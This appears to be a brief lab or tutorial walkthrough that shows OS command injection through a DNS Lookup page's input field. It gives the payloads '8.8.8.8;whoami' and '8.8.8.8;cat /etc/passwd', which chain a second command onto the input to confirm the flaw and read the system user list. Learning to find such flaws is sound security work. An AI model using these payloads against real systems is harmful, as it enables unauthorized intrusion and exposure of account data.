Extracting User Accounts
Last updated
Last updated
Go to DNS Lookup page:
We can use a valid value and concatenate it with an operator like as ; & | etc to insert a command not allowed: 8.8.8.8;whoami
Our last command confirm the vulnerability, however we know that the userlist are retrievable into /etc/passwd file and using this payload: 8.8.8.8;cat /etc/passwd